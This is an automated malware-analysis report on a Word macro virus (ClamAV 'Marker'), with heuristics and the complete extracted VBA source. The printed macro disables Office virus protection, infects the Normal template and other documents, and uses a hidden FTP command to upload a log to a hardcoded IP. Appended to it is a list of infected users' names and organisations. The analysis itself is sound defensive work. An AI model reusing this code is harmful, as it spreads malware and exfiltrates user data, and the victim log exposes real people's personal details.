Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1553.005 Mark-of-the-Web Bypass
This malicious Word document contains VBA macros that attempt to disable macro security settings and replicate themselves to the normal template, indicating a self-propagation and persistence mechanism. The script also attempts to write specific content to 'c:\netldx.vxd' and includes hardcoded FTP-like commands, suggesting it may download additional payloads.
Heuristics (6)
- ClamAV: Doc.Trojan.Marker-31 (severity: critical; rule: CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Trojan.Marker-31
- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 2 related findings)
  Document contains VBA macro code
- Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
  Potential Shell call in VBA
  Matched line in script: Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
- VBA macro-virus self-replication / AV tampering (severity: critical; rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Options.VirusProtection = False
- NOP-equivalent sled detected (severity: medium; rule: SC_NOP_EQUIV_SLED)
  Long run of 0x40 bytes
- Embedded URL (severity: info; rule: EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7272 bytes |

SHA-256: 5fd49a440b3c0ea4d05449a7d979a7e506c1ef5c3fc174d2988f88304d3f436d
Detection: ClamAV: Doc.Trojan.Marker-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'
' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'
' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'
' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'
' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'
' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'
' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'
' 03:37:57 PM - Saturday, 30 Jan 1999
' hornd
'
' 01:26:48 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 04:57:29 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 06:35:44 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 04:23:52 PM - Thursday, 4 Feb 1999
' Cooley Godward
'
' 04:27:39 PM - Saturday, 6 Feb 1999
' Cooley Godward
'
' 06:18:06 PM - Monday, 8 Feb 1999
' Cooley Godward
'
' 09:17:17 PM - Tuesday, 9 Feb 1999
' hclee
'
' 04:44:45 PM - Wednesday, 17 Feb 1999
' Dr. W. Hsiao
' Wendy Hsiao, Ph.D.
' 04:13:19 PM - Tuesday, 23 Feb 1999
' CCST
'
' 10:09:35 AM - Saturday, 20 Mar 1999
' cpwu
'
' 09:33:49 AM - Thursday, 6 May 1999
' 柳建华
'
' 12:39:25 PM - Tuesday, 20 May 1997
' ghc-bbc
'
' 01:21:36 PM - Friday, 7 May 1999
' 李晋闽
'
' 05:51:53 - Wednesday, 12 May 1999
' qdzhuang
'
' 03:23:04 PM - Saturday, 19 Jun 1999
' 李晋闽
'
' 02:53:46 下午 - Tuesday, 6 Sep 2011
' 李晋闽
'
' 09:37:47 上午 - Monday, 19 Sep 2011
' 张士力
'
' 01:41:54 下午 - Monday, 26 Sep 2011
' unknown
'
' 10:50:02 上午 - Wednesday, 19 Oct 2011
' 祝昊泉
'
' 08:27:05 上午 - Wednesday, 26 Oct 2011
' 迟文倩
'
' 10:37:36 上午 - Monday, 31 Oct 2011
' 蒋运枫
'
' 04:21:38 下午 - Monday, 31 Oct 2011
' 李彩梅
'
' 08:15:53 上午 - Wednesday, 2 Nov 2011
' 张会芳
'
' 02:57:58 下午 - Thursday, 3 Nov 2011
' unknown
'
' 04:00:59 下午 - Thursday, 3 Nov 2011
' 田敏
'
' 09:41:48 上午 - Friday, 4 Nov 2011
' 钟虹
'
' 11:18:07 上午 - Monday, 7 Nov 2011
' unknown
'
' 03:01:17 下午 - Monday, 21 Nov 2011
' unknown
'
' 09:59:34 上午 - Wednesday, 28 Dec 2011
' unknown
'
' 11:26:57 上午 - Wednesday, 22 Feb 2012
' unknown
'
' 09:22:07 上午 - Monday, 30 Apr 2012
' 梁小兵
'
' 10:07:34 上午 - Monday, 7 May 2012
' 20068726
'
' 11:29:21 上午 - Friday, 1 Jun 2012
' 20066938
'
' 07:19:38 PM - Sunday, 3 Jun 2012
' User
'
' 04:24:06 下午 - Friday, 8 Jun 2012
' 20065673
'
' 11:01:27 上午 - Friday, 15 Jun 2012
' 贵大学生资助管理中心
'
' 11:12:24 上午 - Tuesday, 6 May 2014
' User
'
' 04:41:18 下午 - Thursday, 15 May 2014
' User
'
' 10:18:56 上午 - Tuesday, 20 May 2014
' User
'
' 08:56:37 上午 - Monday, 26 May 2014
' User
'
' 03:09:44 下午 - Monday, 26 May 2014
' Windows 用户
'